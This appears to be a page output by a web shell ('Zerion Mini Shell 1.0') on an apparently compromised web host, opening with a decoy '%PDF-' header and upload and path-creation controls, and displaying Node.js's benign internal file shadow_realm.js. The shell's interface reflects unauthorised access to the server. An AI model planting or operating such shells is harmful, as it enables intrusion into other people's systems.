%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/vittasync.vacivitta.com.br/vittasync/node/lib/internal/bootstrap/
Upload File :
Create Path :
Current File : /home/vacivi36/vittasync.vacivitta.com.br/vittasync/node/lib/internal/bootstrap/shadow_realm.js

'use strict';

// This script sets up the context for shadow realms.

const {
  prepareShadowRealmExecution,
} = require('internal/process/pre_execution');
const {
  BuiltinModule,
} = require('internal/bootstrap/realm');

BuiltinModule.setRealmAllowRequireByUsers([
  /**
   * The built-in modules exposed in the ShadowRealm must each be providing
   * platform capabilities with no authority to cause side effects such as
   * I/O or mutation of values that are shared across different realms within
   * the same Node.js environment.
   */
]);

prepareShadowRealmExecution();

Zerion Mini Shell 1.0